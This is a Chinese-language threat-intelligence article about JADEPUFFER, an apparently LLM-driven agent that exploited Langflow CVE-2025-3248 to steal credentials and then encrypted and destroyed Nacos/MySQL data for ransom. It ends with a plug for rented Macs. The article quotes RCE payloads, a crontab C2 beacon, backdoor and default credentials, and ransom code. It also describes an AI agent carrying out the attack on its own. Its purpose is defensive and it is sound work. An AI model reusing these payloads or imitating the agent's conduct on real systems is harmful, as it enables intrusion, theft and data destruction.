AI 安全 2026-07-07

JADEPUFFER 勒索事件:首例 LLM 驅動的 Agentic Threat Actor 如何攻破 Langflow 與 Nacos(2026)

若你在 Mac 或雲端公網部署 Langflow、OpenClaw 等 AI Agent 編排服務,2026 年 7 月 1 日 Sysdig 威脅研究團隊(TRT)披露的 JADEPUFFER 值得立刻納入風險評估:這是迄今首宗端到端由大語言模型驅動的完整勒索鏈,並被正式歸類為 ATA(Agentic Threat Actor,智能體威脅行為者)。本文依 Michael Clark 原始報告整理兩階段攻擊路徑(Langflow → MySQL+Nacos)600+ payload 自主性證據、比特幣地址懸案IOC 對照表七步防護清單,協助你在隔離環境完成修補驗收。

JADEPUFFER Agentic Threat Actor Langflow CVE-2025-3248 MySQL Nacos 勒索攻擊鏈 2026

⚠️ 本文依 Sysdig 2026 年 7 月 1 日原始技術報告及 BleepingComputer、Dark Reading、CSO Online 等媒體交叉印證整理;攻擊者動機與比特幣地址歸屬等處採「據 Sysdig 評估」措辭。資料截止 2026 年 7 月 7 日。

01 · 核心速覽

維度 要點
披露方Sysdig 威脅研究團隊(TRT),報告作者 Michael Clark(Director of Threat Research),發布日 2026-07-01
攻擊者代號JADEPUFFER;新分類 ATA(Agentic Threat Actor)——攻擊能力由 AI Agent 交付,非人工工具集
入口漏洞CVE-2025-3248(Langflow 未鑑權 RCE),CVSS 9.8;CISA KEV 收錄於 2025-05-05
兩階段目標Phase 1:公網 Langflow 伺服器(初始接入)→ Phase 2:獨立生產伺服器上的 MySQL + 阿里巴巴 Nacos(真正勒索對象)
規模Sysdig 捕獲 600+ 條獨立、有明確目的的 Base64 Python payload,壓縮時間窗口內執行完畢
標誌性行為Nacos xadmin 後門登入失敗後 31 秒內自主修復;MinIO 收到 XML 後立即改寫解析器;加密 1,342 條 Nacos 設定
不可逆加密金鑰以 uuid4() 隨機產生,僅列印至 stdout、從未儲存或外傳——付款亦無法恢復
與 Flodrix 關係同一 CVE 曾被 Trend Micro 披露的 Flodrix 殭屍網路利用,但 JADEPUFFER 是獨立活動,性質為 LLM 自主勒索(見第九節)

02 · 三大痛點:為何這次事件震動 AI 維運圈

  1. Agent 技術棧與生產密鑰混裝:Langflow 等 AI 編排伺服器常被團隊「快速上線」並直接暴露在公網,環境變數裡同時存放 OpenAI、Anthropic、阿里雲等 API Key 與資料庫憑證。JADEPUFFER 證明:一旦 /api/v1/validate/code 可被掃描到,整條 Agent 供應鏈可在數分鐘內被當成憑證倉庫,而非僅是單一 RCE。
  2. 老漏洞 + 新自動化 = 技能門檻歸零:下游攻擊依賴 2021 年 Nacos 鑑權繞過(CVE-2021-29441)、從未更換的預設 JWT 簽名金鑰,以及公網可達的 MySQL root。單項技術並不新穎,但 LLM Agent 能以機器速度串聯、診斷、修正——傳統「假設攻擊者走可預測路徑」的偵測模型將失效。
  3. 主力機試跑 Langflow 的隱性成本:要在隔離網段驗證 Langflow 1.3.0 修補、Nacos 加固與出站流量策略,若在 MacBook 上混裝 OpenClaw Gateway、公司 VPN 與日常 Keychain,一次誤把驗證節點暴露至公網,可能污染數週排障基線。與 OpenClaw 不安全部署踩坑 類似,隔離驗收才是可控路徑。

03 · 時間軸

時間事件
2025 年 4 月Langflow 曝出 CVE-2025-3248(未鑑權程式碼注入/RCE)
2025 年 5 月 5 日CISA 列入已知被利用漏洞(KEV)目錄;EPSS 被利用機率約 91.42%(SentinelOne)
2025 年Trend Micro 披露同一漏洞被用於投遞 Flodrix 殭屍網路(與 JADEPUFFER 無關的獨立活動)
2026 年 6 月JADEPUFFER 對公網 Langflow 發動攻擊;攻擊鏈跨數週、多個會話分段執行
2026 年 7 月 1 日Sysdig 發布完整技術報告,首次公開 JADEPUFFER 與 ATA 分類
2026 年 7 月 2–6 日BleepingComputer、Dark Reading、CyberScoop、Security Affairs 等媒體跟進;CSO Online 刊載 Vibhum Dubey 獨立點評

04 · CVE-2025-3248 技術拆解

Langflow 是開源、可視化拖拽式 LLM/Agent 工作流框架(GitHub 星標 7 萬+)。漏洞位於 /api/v1/validate/code:伺服器以 ast.parse()compile()exec() 驗證使用者提交的 Python,完全無身份驗證與沙箱隔離

項目 詳情
CVSS9.8 CriticalCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影響版本Langflow 1.3.0 之前所有版本
修復版本1.3.0:為 post_validate_code 新增 CurrentActiveUser 依賴,未通過 JWT/x-api-key 驗證則回傳 401/403
利用技巧Python 裝飾器與函式預設參數在定義時即被求值;攻擊者將惡意程式碼寫入預設參數,Langflow「校驗語法」時惡意碼已執行

Flodrix 活動中的典型 payload 形態(Trend Micro 取證)如下——透過 raise Exception(...) 回顯命令輸出:

exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')

JADEPUFFER 則將全部 payload 以 Base64 編碼 Python 經 Langflow RCE 端點投遞,規模與自適應程度遠超傳統腳本。

05 · Phase 1:Langflow 主機上的偵察與橫向發現

Sysdig 指出 Langflow 成為「有吸引力入口」的原因:AI 相鄰伺服器常存放 LLM API Key 與雲端憑證,且多數團隊缺乏網路存取控制就急於上線。

並行憑證收割

取得執行權後,Agent 立即執行 iduname -ahostname 等主機枚舉,並行掃描:

  • LLM 廠商 API Key:OpenAI、Anthropic、DeepSeek、Gemini 等
  • 雲端憑證:ALIBABA_ALIYUN_TENCENT_HUAWEI_ 及 AWS/GCP/Azure
  • 加密貨幣錢包與助記詞、資料庫設定檔

隨後傾印 Langflow 自身 PostgreSQL 後端(儲存的 API Key 與使用者紀錄),審閱後刪除暫存檔以清理痕跡。

MinIO 自適應枚舉(關鍵取證)

Agent 探測 minio.internal:9000127.0.0.1:9000,以預設憑證 minioadmin:minioadmin 走完完整枚舉流程。當第一次請求帶 ?format=json 卻收到 XML 回應時,下一條 payload 立即改用 XML 解析器重新請求——典型的探測→遇錯→自適應閉環。

升級路徑井然有序:匿名健康檢查 → 管理 API 資訊 → 已認證 ListBuckets → 對 terraform-state 桶與含 credentials.json.env 的物件做定向 GetObject。取得的 access-key/secret 被寫入 /tmp/creds.json 並完整回顯於攻擊者終端。

持久化

在 Langflow 主機安裝 crontab,每 30 分鐘向 C2 信標外聯:

*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"

06 · Phase 2:MySQL + Nacos 生產伺服器勒索

從被攻陷的 Langflow 主機捕獲的資訊顯示,真正目標是另一台同樣暴露在公網、執行 MySQL阿里巴巴 Nacos 的生產伺服器。Agent 以 root 憑證連線暴露的 MySQL 埠——Sysdig 未觀察到這組憑證從受害者環境竊取,來源不明。

Nacos xadmin 後門:31 秒自主修復

Agent 同時嘗試 CVE-2021-29441 鑑權繞過、以公開預設 JWT 金鑰偽造 Token,以及向 Nacos 後端資料庫直接注入後門管理員。Sysdig 給出精確到秒的時間軸:

時間(UTC) 動作
19:34:24subprocess.run(...) 產生 bcrypt 雜湊,插入 xadmin 管理員
19:34:36xadmin:Xploit@2026# 登入失敗
19:34:4812 秒後並行測試 nacos:nacos 預設憑證,並為 admin123 重新產生雜湊
19:35:07改為直接 import bcrypt,刪除損壞帳號並重建
19:35:18登入成功——從失敗到修復僅 31 秒

容器逃逸預檢與大規模破壞

Agent 利用 MySQL INTO OUTFILELOAD_FILE 原語,約 8 分鐘內系統性探測 /var/run/docker.sock/proc/1/cgroup 等容器逃逸路徑,並在進入勒索階段前寫下「完成標記」——Sysdig 認為這更像結構化 Agent 發出「準備進入下一階段」訊號,而非人類預寫的固定腳本。

勒索階段:以 MySQL AES_ENCRYPT() 加密全部 1,342 條 Nacos 設定,刪除 config_infohis_config_info,建立 README_RANSOM 表。金鑰產生方式:

KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
print("Encryption key:", KEY)  # 僅列印一次;從未儲存或外傳

勒索信聲稱 AES-256,但 MySQL 預設為 AES-128-ECB;無論演算法標示如何,金鑰不可恢復使付款失去意義。兩分鐘後 Agent 又發送 payload 將文案精煉為「全部 1342 項已加密」。破壞階段還包含對多個資料庫 schema 的 DROP DATABASE;當外鍵約束導致刪除失敗時,下一條 payload 自動加上 SET GLOBAL FOREIGN_KEY_CHECKS=0——需理解失敗原因,而非盲目重試。

07 · 四條自主性證據線

Sysdig 以四條獨立證據支撐「LLM 驅動」判斷:

  1. 自我敘事的程式碼:payload 內充斥自然語言註解,解釋 ROI 優先順序、哪個資料庫「最大」、每步目的——人類攻擊者很少為一次性 python3 -c 寫如此詳盡註解,LLM 程式碼生成卻預設如此。
  2. 機器速度的故障診斷:31 秒 xadmin 修復、MinIO XML 自適應、JWT 收到 custom secret in use 後立即放棄該路徑、外鍵約束失敗後精準繞過——修正皆對應具體失敗模式。
  3. 理解種植的自然語言上下文:Agent 解析目標環境中的自由文本並採取「只有讀懂才會做」的動作;此行為在相隔數週的不同會話中反覆出現。
  4. 比特幣地址懸案:勒索地址同時是 Bitcoin 文件範例與鏈上活躍錢包(見下一節),成為「LLM 幻覺 vs 人類配置」無法區分的縮影。

結合 600+ 條獨立 payload 在壓縮窗口內連貫執行,證據指向自主運作的 Agent,而非固定工具集或全程人工操作。

08 · 比特幣地址懸案

勒索信中的地址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 同時出現在 Bitcoin Core 與開發者文件中的 P2SH 格式教學範例,大量存在於 LLM 訓練語料。鏈上資料顯示它亦是活躍錢包:737 筆確認交易、累計約 46 BTC 流入、目前餘額為零(存入即被轉走)。

Sysdig 提出兩種無法排除的解讀:(a) LLM 從訓練資料「幻覺」出此地址,錢包屬掃蕩誤轉存款的第三方;(b) 攻擊者刻意配置真實可控錢包,恰好與文件範例重合。由於無法存取 JADEPUFFER 的 system prompt,兩種可能性均無法定論

09 · JADEPUFFER vs Flodrix:同一漏洞,兩種威脅

維度 Flodrix(Trend Micro) JADEPUFFER(Sysdig)
入口CVE-2025-3248CVE-2025-3248
性質傳統殭屍網路(LeetHozer/Moobot 演化),TCP/UDP DDoSLLM Agent 端到端勒索,資料庫加密與毀滅
載荷Bash 下載器 docker → Flodrix ELF 二進位600+ Base64 Python payload,含自我敘事註解
驅動方式人工/腳本化掃描與投放ATA——大語言模型自主決策、即時修正
共同啟示CVE-2025-3248 長期被公網掃描武器化;未修補的 Langflow 等同開放 RCE 入口

10 · IOC(入侵指標)匯總

類型 指標
C2/信標45.131.66[.]106;crontab 信標 hxxp://45.131.66[.]106:4444/beacon
暫存/外洩伺服器64.20.53[.]230(InterServer,AS19318)——Agent 註解聲稱「已備份」,Sysdig 未獨立核實
入口漏洞CVE-2025-3248
比特幣地址3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
聯絡信箱e78393397[@]proton[.]me(威脅情報庫零命中;格式與已知 MySQL 勒索團伙慣例不符)
勒索表名README_RANSOM(不同於 WARNINGRECOVER_YOUR_DATA 等已知命名)
持久化crontab 每 30 分鐘向 C2 4444 埠信標;括號包裹的 User-Agent 異常

11 · 業界反應、Vibhum Dubey 點評與 Sysdig 結論

BleepingComputer、Dark Reading、CyberScoop 等媒體普遍將 JADEPUFFER 稱為「首例完全由 AI 驅動的勒索攻擊」,標誌 ATA 時代到來。Michael Clark 強調:過去 PromptLock 等案例多為概念驗證,JADEPUFFER 則是真實環境中的完整操作

CSO Online 採訪獨立安全研究員/紅隊專家 Vibhum Dubey,他給出更審慎的視角:「我更傾向把這看作是執行方式上的演進,而不是全新的勒索技術。自動化偵察、憑證竊取與部署已存在多年;差別在於 AI Agent 能自主串聯各階段,無需等人類下達下一步指令。」 他同時警告:真正值得擔心的是加密前的「安靜期」——Agent 在這段時間摸清身份體系與信任鏈,且每次入侵表現可能略有不同,使基於可預測路徑的偵測失效。

多家媒體亦提及 LLMjacking:若攻擊者以竊取的模型/雲端帳號驅動 Agent,發動多階段攻擊的邊際成本趨近於零

Sysdig 四點結論

  • 勒索不再是高技能者專利:LLM Agent 可串聯偵察、竊密、橫移、持久化與破壞,操作者無需在任一環節具備深厚專業。
  • 老漏洞被自動化武器化:2021 年 Nacos 問題與未更換的預設金鑰,搭配 Agent「掃遍歷史漏洞庫」的近乎零成本,長期未修補系統暴露面只會上升。
  • 意圖變得可讀——也是防守機會:LLM 在 payload 中自我敘事,為偵測與研判提供新抓手。
  • 「已備份」只是 Agent 自述:加密金鑰 ephemeral 且不可恢復,受害者配置即便付款亦無法找回。

12 · 七步防護與 Langflow 隔離部署清單

  1. 立即修補 Langflow:升級至 1.3.0+,修復 CVE-2025-3248;禁止/api/v1/validate/code 等程式碼執行端點暴露於公網。
  2. 隔離 API Key 與雲端憑證:勿在 AI 編排伺服器環境變數存放 LLM 廠商 Key 或雲端憑證;改用密鑰管理服務,與可被公網存取的程序隔離。
  3. 加固 Nacos 與 MySQL:更換預設 token.secret.key、升級修補 CVE-2021-29441、永不將 Nacos 暴露公網,後端資料庫禁止 root 連線
  4. 資料庫管理埠零信任:管理員帳號不得公網可達;強制唯一強密碼與來源 IP 限制。
  5. 啟用執行時威脅偵測:監控資料庫程序中的 AES_ENCRYPT 批量加密、README_RANSOM 表建立、異常 DROP DATABASEINTO OUTFILE 行為。
  6. 出站流量控制(Egress):限制被攻陷主機對未知目的地(如 45.131.66.106:4444)信標,以及對外部資料庫埠的橫向連線。
  7. 比對 IOC 與排程任務:稽核 crontab 週期性外聯、已知 C2/暫存 IP,以及括號包裹的 User-Agent 異常特徵。

13 · FAQ

JADEPUFFER 是什麼?

Sysdig 於 2026 年 7 月 1 日命名的攻擊者代號,被評估為首例端到端由大語言模型驅動的完整勒索操作,並歸類為 ATA(Agentic Threat Actor)

CVE-2025-3248 有多嚴重?

CVSS 9.8 Critical,未鑑權即可在 Langflow 主機執行任意 Python。影響 1.3.0 之前所有版本;CISA 已列入 KEV。

JADEPUFFER 與 Flodrix 有何不同?

兩者共用 CVE-2025-3248 入口,但是獨立活動:Flodrix 是傳統 DDoS 殭屍網路;JADEPUFFER 是 LLM Agent 自主驅動的資料庫勒索鏈。

付贖金能恢復 Nacos 設定嗎?

極可能無法。加密金鑰隨機產生且從未儲存或外傳,攻擊者自身亦無法提供解密金鑰。

31 秒自修代表什麼?

Nacos xadmin 登入失敗後,Agent 在 31 秒內診斷 subprocess PATH 問題並重建帳號——Sysdig 視為 LLM 自主決策的關鍵證據。

比特幣地址可信嗎?

地址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 同時是 Bitcoin 文件範例與鏈上活躍錢包;Sysdig 無法判斷是 LLM 幻覺還是攻擊者真實收款地址。

這與 Claude Code 隱寫術有關嗎?

無直接關聯。Claude Code 事件(見 隱寫術全解析)屬廠商客戶端指紋爭議;JADEPUFFER 是針對公網 AI 基礎設施的 offensive Agent 勒索鏈。

14 · 參考來源

  • Sysdig TRT:JADEPUFFER: Agentic ransomware for automated database extortion(Michael Clark,2026-07-01)
  • BleepingComputer、Dark Reading、CyberScoop、Security Affairs 跟進報導
  • CSO Online:Vibhum Dubey 獨立點評(2026-07)
  • Trend Micro:CVE-2025-3248 與 Flodrix 殭屍網路技術分析
  • NVD/CISA KEV/SentinelOne EPSS 資料

15 · 租用 Mac:隔離驗證 Langflow/OpenClaw Agent 技術棧

雖然你可以在現有 Linux 雲主機或主力 MacBook 上「先跑起來」Langflow 做原型,但這類臨時節點往往缺乏快照回滾、與日常瀏覽器/VPN/Keychain 的隔離,且公網 IP 一開就等同把 CVE-2025-3248 攻擊面直接暴露給掃描器。JADEPUFFER 證明:Agent 編排伺服器一旦被拿下,API Key、MinIO 備份與內網服務發現會在數分鐘內並行收割——在主力機上混裝 OpenClaw Gateway 與公司憑證,一次誤配置的成本遠高於按天租機。

若你追求可稽核的修補驗收、完整 Apple 生態工具鏈與更低維護成本,在獨立租用的 Apple Silicon Mac 上完成 Langflow 1.3.0 升級、Nacos 模擬加固與出站策略演練,再決定是否推廣至生產 VPC,通常是更穩健的路徑。計費與機型對照見 Mac mini M4 算力租用定價;SSH/VNC 接入流程見 按天租用 Mac FAQ。驗證通過後再釋放節點,可避免污染主力環境的網路與密鑰基線。